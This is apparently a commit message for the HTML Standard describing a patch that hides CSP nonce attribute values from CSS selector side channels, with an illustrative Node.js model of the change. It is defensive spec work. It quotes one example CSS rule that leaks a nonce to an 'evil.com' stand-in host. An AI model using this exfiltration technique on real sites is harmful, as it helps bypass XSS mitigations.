Hide nonce content attribute values

Some [recent attacks on CSP][1] rely on the ability to exfiltrate
nonce data via various mechanisms that can read content attributes.
CSS selectors are the best example: through clever use of
prefix/postfix text matching selectors, values can be sent out to an
attacker's server for reuse (e.g.,
`script[nonce=a] { background: url("https://evil.com/nonce?a");}`).

This patch mitigates the risk of this class of attack by hiding the
nonce value from elements' content attributes by moving the `nonce`
attributes into a new `NoncedElement` interface mixin, which is
included into `HTMLElement`. That mixin defines the following
behaviors for the `nonce` content attribute:

1.  When the `nonce` content attribute is set or changed, its new
    value is copied into a `[[CryptographicNonce]]` slot on the
    element.

2.  When a `NoncedElement` is inserted into a document which was
    delivered with a `Content-Security-Policy` header, the `nonce`
    content attribute is cleared out.

The `nonce` IDL attribute getter and setter now operate on the
`[[CryptographicNonce]]` slot's value rather than reflecting the
content attribute, meaning that the nonce value remains exposed
to script, but is opaque to non-script side-channels.

Likewise, the `[[CryptographicNonce]]` slot's value is used when
populating a request's cryptographic nonce metadata in order to
deliver the nonce to CSP for validation.

Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding

Closes #2369.

[1]: https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
mikewest authored and annevk committed Nov 22, 2017
1 parent 52d09c9 commit 19f5cce801550d278b9459f8c4797f9f86aae864
Showing with 97 additions and 56 deletions.
  1. +97 −56 source
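As an added illustration (not code from the commit or from the HTML Standard), the following Node.js model implements the two `NoncedElement` behaviours the commit message describes and shows what a CSS attribute selector, script, and the request's nonce metadata each see afterwards. The `NoncedElement`, `CspDocument`, `attributeSelectorMatches`, `requestNonceMetadata` and `nonceVisibility` names, and the sample nonce `abc123`, are this example's own constructions.

```javascript
// Added example (not from the commit or the HTML Standard): a Node.js model of the
// NoncedElement behaviour described above; all class/function names are this example's own.
class NoncedElement {
  constructor() {
    this.attributes = new Map();  // content attributes, what CSS selectors can observe
    this.cryptographicNonce = ""; // models the [[CryptographicNonce]] slot
  }
  // Step 1: setting or changing the nonce content attribute copies it into the slot.
  setAttribute(name, value) {
    this.attributes.set(name, String(value));
    if (name === "nonce") this.cryptographicNonce = String(value);
  }
  getAttribute(name) { return this.attributes.has(name) ? this.attributes.get(name) : null; }
  // IDL attribute: getter and setter work on the slot, not the content attribute.
  get nonce() { return this.cryptographicNonce; }
  set nonce(value) { this.cryptographicNonce = String(value); }
}

class CspDocument {
  constructor(deliveredWithCsp) { this.deliveredWithCsp = deliveredWithCsp; this.nodes = []; }
  // Step 2: inserting into a document delivered with a Content-Security-Policy
  // header clears the nonce content attribute; without CSP it is left alone.
  insert(el) {
    if (this.deliveredWithCsp) el.attributes.delete("nonce");
    this.nodes.push(el);
  }
}

// A CSS attribute selector such as script[nonce="..."] sees only content attributes.
function attributeSelectorMatches(el, name, value) { return el.getAttribute(name) === value; }

// Populating a request's cryptographic nonce metadata reads the slot.
function requestNonceMetadata(el) { return el.nonce; }

// Run the commit's scenario and report what each observer ends up seeing.
function nonceVisibility(deliveredWithCsp) {
  const doc = new CspDocument(deliveredWithCsp);
  const script = new NoncedElement();
  script.setAttribute("nonce", "abc123"); // constructed sample nonce value
  doc.insert(script);
  return {
    cssCanSeeNonce: attributeSelectorMatches(script, "nonce", "abc123"),
    contentAttribute: script.getAttribute("nonce"),
    idlNonce: script.nonce,
    requestNonce: requestNonceMetadata(script),
  };
}

console.log(nonceVisibility(true));  // CSP-delivered: cssCanSeeNonce false, idlNonce "abc123"
console.log(nonceVisibility(false)); // no CSP: content attribute remains, cssCanSeeNonce true
```

In a real browser the equivalent check is comparing `el.getAttribute('nonce')` (empty once hidden) with `el.nonce` (still the value) on a page served with a CSP header.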